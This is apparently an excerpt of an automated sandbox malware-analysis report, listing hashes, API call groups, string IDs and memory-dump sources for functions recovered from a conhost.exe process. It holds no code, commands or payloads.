                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: BA018039706B4082EB20DB12E95C75963A1F788FD4F488074DE4E43754DE3CC58AC781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: ac7c4ac7de9aee15495a2e589d8e7e5a6b981f5f1e7ede2aed1248f51b95cd8f
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: C0014C69313B40C2FB349B21E84DB1973A0BB49B59F048128DE4E163A4FF3EC049C746
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 17ed52745e365a8408c84ca6bb622ccf60e65b3c4597bb30f6ce6b04dad794eb
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 81F0AF3631568492EB308B20F98C7596760F744B98F84C021CA4A42964EE6CC689CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 3acc293646c395c00861105a007a814ec3c1d58159ea3ed2bdd10760442ca137
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 19F0B46930270181EB208B24E88D7692330EB89765F548359DA6A465E4DF3CC44AC352
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 4fc6375478b0a17b877521579f7908c5893f33443ddc84f2a485429732663030
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 6DF08C68309B8082EA249B13B91C129A260BB48FC4F88E071EE4B47B18CE3CC447C701
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 8936a7dc1bbd2d748e49db142c25620c3457ccd0221bc93dfde4c61f3e78aa6d
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: EF02EB3621AB8486E7A0CB55F49935ABBA1F3C4794F108015EACE87BA8DF7CC494CF01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: b0ba509dbb98700e6e887e91f6f59de4aac692a57d13ad9afcd96bd2be96a539
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 9F51D43A306A018BE764CF16F44CA5AB3A0F788B94F54C119DE5A43B58DF3AD945CB42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: b9621a9c596a872ef88ee11a8715c9348c210cd54e67b0156bd6da36791a59d9
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 2551C639316A4287E724CF16F84CA6AB7A1F789B84F50C119DE5A4375CDF3AD906CB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: ca36e05741647b8c68efae5cd11fd7c248877a2a801e192f1ca8485f5dc85ffd
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 0B61777A62AB44C6E760CB15E45D31AB7A1F388754F509116FA8E47BA8DF7CC540CF02
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 6681868e44065d9410fa468205e4fe76258d7dc5f80591eb99ee02aef7b08bf0
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 12114F2A70AB4093EF248B21E40D61AA7B0FB45B94F048126DE4D037A4EF7DC955C785
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: c468c18884cea41f942db7d7a4857fcd8af1b0dfbcd5f0bbacfa228b73f9871b
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: AF51AD3A313A208AEB54CF25E44CB6C7792F754BA8F69C125EE5A47788DF79C841C702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: a8d5cd539f29786872f530d78bbe1d60acd068cb486baa63d498f813751f75cb
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 0F518E7A3062888EEB748F22954E36C77A0F755B94F14D116DA9A87BD5CF38C492CB03
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 8feb0e1bb6eb2ce1acead81155ee0211bccc79812d5847773d063c6a10e126a8
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 50618C36609BC485EB218F15E44879AB7A0F785B98F448216EFD817B9ADF78C190CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ab00a8567207ba424e20d264e4dbf47a6d8adb7b6e7ba714a659471e1aaaba05
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: AB516A7A3067808BEB748F22964C3587BA2F394B94F14C116DE9947BD5CF38D8A1CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 7ba5da1e2ab4b16bee62ce66c2854284f8110ddfa3e860b53032039307f23cd3
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 9311B629316F8192FB209B75E90D35A67A4F784780F80C0259E49C36D4EF78CD06C741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: e6744d186ac7f78aceb1b30b267d0475328b1a677803dd5b8a4487992384edbf
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 89D1FF36716A8089E721CFA5D8487DC37B1F354B98F818216EE5EA7B99DE34D107C341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 0adb82a042643104f8ecc05cec9cadd47a18e52efd281ef19bf7e8549e498bc5
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: B501653A712B80DAE725DF66E80D65977A0F788F84B098065DF4A43728EF38D092C740
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000286D7D228DF), ref: 00000286D7D22A12
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: dba762219fd8ce12d82f81b9d3d125fe3775f202ff765f858fba3b94eb4a622d
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 4491113A71265089FB708F65985C3AD3BA0F358B98F958106EE4A67A8DDF34D487C302
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: c8629393f6991ed1c3faba27eb96233f44035f8aec5c4019c49e82440b41536b
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 34115B2A712F048AEB10CF60E85D3A833A4F719768F840E21EE6E967A4DF78C195C341
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 3e6d6f8620ac9ccc62722c743387132ed9c16cf4fc16beed7a9a7b48bedd55ed
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 6371B03A341B8242EB74DF2A995C3EA6794F385BD4F448016DD4A53B8CDE36DA01C741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 93e3f10bdc43480d713e4d43ec452c9589eb041de5fb6d73aa1e7f05e05d18f5
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: C551DF3A313A688EEB64CF15E44DB6C73E5E344B98F55D125EA6A83788DF78C842C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
